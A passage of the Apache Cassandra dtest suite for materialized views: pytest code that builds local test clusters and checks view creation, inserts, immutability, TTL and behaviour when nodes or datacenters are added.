if __name__ == '__main__':
args = parser.parse_args()
run(args)
|
materialized_views_test.py | import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks, mk_bman_path
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate([nodes, 0], install_byteman=install_byteman)
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, **kwargs)
create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def update_view(self, session, query, flush, compact=False):
session.execute(query)
self._replay_batchlogs()
if flush:
self.cluster.flush()
if compact:
self.cluster.compact()
def _settle_nodes(self):
logger.debug("Settling all nodes")
stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")
def _settled_stages(node):
(stdout, stderr, rc) = node.nodetool("tpstats")
lines = re.split("\n+", stdout)
for line in lines:
match = stage_match.match(line)
if match is not None:
active = int(match.group('active'))
pending = int(match.group('pending'))
if active != 0 or pending != 0:
logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
return False
return True
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and not _settled_stages(node):
time.sleep(0.1)
attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
logger.debug("waiting for view")
def _view_build_finished(node):
s = self.patient_exclusive_cql_connection(node)
query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(s.execute(query))
return len(result) == 0
for node in self.cluster.nodelist():
if node.is_running():
attempts = 50 # 1 sec per attempt, so 50 seconds total
while attempts > 0 and not _view_build_finished(node):
time.sleep(1)
attempts -= 1
if attempts <= 0:
raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
"""Wait for the start of a MV build, ensuring that it has saved some progress"""
start = time.time()
while True:
try:
query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(session.execute(query))
assert 0 == result[0].count
except AssertionError:
break
elapsed = (time.time() - start) / 60
if elapsed > wait_minutes:
pytest.fail("The MV build hasn't started in 2 minutes.")
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
self._settle_nodes()
def _replay_batchlogs(self):
for node in self.cluster.nodelist():
if node.is_running():
logger.debug("Replaying batchlog on node {}".format(node.name))
node.nodetool("replaybatchlog")
# CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
node_session = self.patient_exclusive_cql_connection(node)
result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
if exists:
assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
if self.cluster.version() >= '3.11':
assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
else:
assert_none(session, "SELECT * FROM system.built_views")
if self.cluster.version() >= '3.11':
assert_none(session, "SELECT * FROM system_distributed.view_build_status")
assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
"""
drop keyspace or view should clear built_views and view_build_status
"""
session = self.prepare(rf=2, nodes=2)
def populate_data(session, rows):
logger.debug("populate base data")
for v in range(rows):
session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))
def verify_data(session, rows, views):
logger.debug("verify view data")
for v in range(rows):
for view in range(views):
assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])
def create_keyspace(session, ks="ks1", rf=2):
create_ks(session, ks, rf)
def create_table(session):
logger.debug("create base table")
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
def create_views(session, views, keyspace="ks1"):
logger.debug("create view")
for view in range(views):
session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view),
timeout=60)
self._wait_for_view(keyspace, "mv{}".format(view))
def drop_keyspace(session, keyspace="ks1"):
logger.debug("drop keyspace {}".format(keyspace))
session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace),
timeout=60)
def drop_views(session, views):
logger.debug("drop all views")
for view in range(views):
session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))
rows = 100
views = 5
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_keyspace(session)
self._assert_view_meta(session, views, exists=False)
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_views(session, views)
self._assert_view_meta(session, views, exists=False)
def test_create(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting 1 materialized view == got" + str(result)
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the bease table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def test_insert(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
assert len(result) == 2, "Expecting {} users, got {}".format(2 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
assert len(result) == 1, "Expecting {} users, got {}".format(1 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
assert len(result) == 0, "Expecting {} users, got {}".format(0 == len(result))
def test_populate_mv_after_insert(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
"""Test that a view is OK when created with existing data with wide rows"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
for i in range(5):
for j in range(10000):
session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(5):
for j in range(10000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute(selectPrepared.bind(['TX'])))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute(selectPrepared.bind(['CA'])))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute(selectPrepared.bind(['MA'])))
assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state on base table with materialized views."
)
def test_drop_table(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 0, "Expecting {} materialized view, got {}".format(1, len(result))
def test_clustering_column(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
session.cluster.control_connection.wait_for_schema_agreement()
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
logger.debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Writing 1k to base")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Reading 1k from view")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Reading 1k from base")
for i in range(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
logger.debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
logger.debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
if nts:
session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
node4.nodetool('rebuild dc1')
node5.nodetool('rebuild dc1')
cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)
logger.debug("Verifying data from new node in view")
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Inserting 100 into base")
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Verify 100 in view")
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
"""
@jira_ticket CASSANDRA-12984
Assert that MVs are marked as build after bootstrap. Otherwise newly streamed MVs will be built again
"""
assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
self._base_test_insert_during_range_movement(rf=1)
def test_insert_during_range_movement_rf2(self):
self._base_test_insert_during_range_movement(rf=2)
def test_insert_during_range_movement_rf3(self):
self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
"""
@jira_ticket CASSANDRA-14251
Test that materialized views replication work in the middle of a join
for different replication factors.
"""
session = self.prepare(rf=rf)
logger.debug("Creating table and view")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Starting new node4 in write survey mode")
node4 = new_node(self.cluster, data_center="dc1")
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
"-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug("Insert data while node4 is joining")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Finish joining node4")
node4.nodetool("join")
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug("Verify data")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(10):
for j in range(100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(10):
for j in range(100):
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100):
if j % 10 == 0:
session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))
self.cluster.flush()
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100, 110):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(10):
for j in range(110):
if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with very wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(5):
for j in range(5000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(5):
for j in range(5000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(5):
for j in range(5000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(5):
for j in range(5100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(5):
for j in range(5100):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_allow_filtering(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def test_secondary_index(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def test_ttl(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in range(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
